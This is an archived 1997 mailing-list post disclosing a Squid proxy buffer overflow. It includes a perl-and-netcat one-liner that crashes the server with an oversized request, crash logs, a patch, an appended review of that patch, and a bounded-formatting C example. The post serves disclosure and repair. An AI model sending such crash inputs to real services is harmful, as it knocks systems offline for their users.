squid buffer overflow + fix (fwd)

From: miguel a.l. paraz <map@dont-contact.us>
Date: Tue, 16 Dec 1997 00:26:23 +0800 (HKT)


is there going to be a Bugtraq or CERT advisory soon? :)

--
miguel a.l. paraz	iphil communications, makati city, ph	+63-2-750-2288
---------- Forwarded message ----------
Date: Mon, 15 Dec 1997 15:13:44 +0300
From: Alexander Saleemon <lee@ewsd.chtts.ru>
To: squid-users@nlanr.net
Subject: squid buffer overflow + fix
Resent-Date: Mon, 15 Dec 1997 04:19:47 -0800 (PST)
Resent-From: squid-users@nlanr.net
perl -e 'print "GET http://somehost.net/", ("\010" x 66000),"\n\n"' |
          netcat myhost 3128
Almost instant crash for squid-1.1.15 and .18 on Linux2.0.29 and FreeBSD2.2.5R
Lines from cache.log:
97/12/09 14:08:57| clientReadRequest: FD 23 Invalid Request
97/12/09 14:08:57| ERR_INVALID_REQUEST: GET http://____/^H^H^H^H^H^H^H^H^H^H^H
                                       ^^^ in fact, almost 66K "\010"s
97/12/09 14:08:57| WARNING: FD 23: A comm_write is already active.
FATAL: Received Segment Violation...dying.
97/12/09 14:08:57| storeWriteCleanLog: Starting...
97/12/09 14:08:57|      4096 lines written so far.
97/12/09 14:08:58|      8192 lines written so far.
97/12/09 14:08:58|     12288 lines written so far.
97/12/09 14:08:58|   Finished.  Wrote 13992 lines.
97/12/09 14:08:58|   Took 1 seconds (13992.0 lines/sec).
CPU Usage: user 8 sys 5
It looks like squid dies in _db_print while trying to vsprintf a too-long line
into a BUFSIZ array.
While LOCAL_ARRAY expands to "static char f[BUFSIZ]" and not to a stack variable,
I wonder if it is possible to exploit this bug/feature and execute machine code
(even with non-root access).
There is no corresponding line in access.log, so this kind of attack
leaves no traces of the source address (please correct me if I'm wrong)
(default debug flags assumed).
Simple patch for .18 follows:
*** icp.c.orig	Fri Oct 31 18:41:14 1997
--- icp.c	Mon Dec 15 14:34:04 1997
***************
*** 1808,1813 ****
--- 1808,1816 ----
  	    0);
      } else {
  	/* parser returned -1 */
+ 	/* 15-12-97 chop wrong request to avoid buffer overflow */
+         if(strlen(icpState->inbuf) > 1024) icpState->inbuf[1023] = '\0'; 
+         /* now we're relatively safe to print diags */
  	debug(12, 1, "clientReadRequest: FD %d Invalid Request\n", fd);
  	wbuf = squid_error_request(icpState->inbuf,
  	    ERR_INVALID_REQ,
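Review bot: the chop guards only this one debug() call site, while the crash described above is in _db_print's fixed BUFSIZ array, so any other caller that formats request-controlled text into a debug line stays exposed; bounding the formatting inside _db_print itself (vsnprintf with the array's size) would cover every site at once. The literal 1024 is also unrelated to the buffer it protects: cache.log shows the request printed after a timestamp and "ERR_INVALID_REQUEST: ", so a 1023-byte request still yields a line longer than 1024 bytes, which still overflows where BUFSIZ is 1024 (as on the FreeBSD build in the report); deriving the limit from BUFSIZ minus room for that prefix would close this. Minor: `if(strlen(icpState->inbuf) > 1024) icpState->inbuf[1023] = '\0';` leaves a string of exactly 1024 bytes untouched although the index shows 1023 was meant as the cap, so `>= 1024` matches the intent, and the added lines are space-indented where the surrounding code uses tabs.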
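As an added example (not Squid's code and not the posted patch): a bounded stand-in for the _db_print formatting the report says overflowed, beside the patch's truncation idea with the limit derived from BUFSIZ instead of a literal 1024. The function names, PREFIX_ROOM and the 70000-byte request buffer are assumptions; the request is rebuilt from the perl one-liner in the report.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Bounded stand-in for Squid's _db_print (added example, not Squid's code).
 * The original used vsprintf() into "static char f[BUFSIZ]", so a debug line
 * longer than BUFSIZ overran it. Returns 1 if the line was cut, 0 if it fit. */
static int db_print_bounded(char *out, size_t outsz, const char *fmt, ...)
{
    va_list ap; int n;
    va_start(ap, fmt);
    n = vsnprintf(out, outsz, fmt, ap);   /* never writes past outsz bytes */
    va_end(ap);
    return n < 0 || (size_t)n >= outsz;
}
/* The idea behind the posted patch, with the limit derived from the buffer
 * it protects instead of the literal 1024. PREFIX_ROOM (an assumed value)
 * leaves space for the "97/12/09 14:08:57| ERR_INVALID_REQUEST: " prefix
 * that cache.log shows in front of the request. Returns the new length. */
#define PREFIX_ROOM 128
static size_t chop_request(char *req)
{
    size_t max = BUFSIZ - PREFIX_ROOM - 1;
    if (strlen(req) > max)
        req[max] = '\0';
    return strlen(req);
}
/* Rebuild the report's request (66000 backspaces after the URL) and format
 * it as _db_print would into a BUFSIZ array. Returns the resulting length. */
static size_t demo_invalid_request(void)
{
    static char req[70000];   /* assumed size, large enough for the request */
    static char line[BUFSIZ];
    size_t i = 24;            /* strlen("GET http://somehost.net/") */
    memcpy(req, "GET http://somehost.net/", i);
    while (i < 24 + 66000)
        req[i++] = '\010';
    req[i] = '\0';
    chop_request(req);
    db_print_bounded(line, sizeof line,
                     "97/12/09 14:08:57| ERR_INVALID_REQUEST: %s\n", req);
    return strlen(line);
}
int main(void)
{
    printf("formatted %zu bytes into a %d-byte buffer\n",
           demo_invalid_request(), (int)BUFSIZ);
    return 0;
}
```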
Received on Tue Jul 29 2003 - 13:15:44 MDT
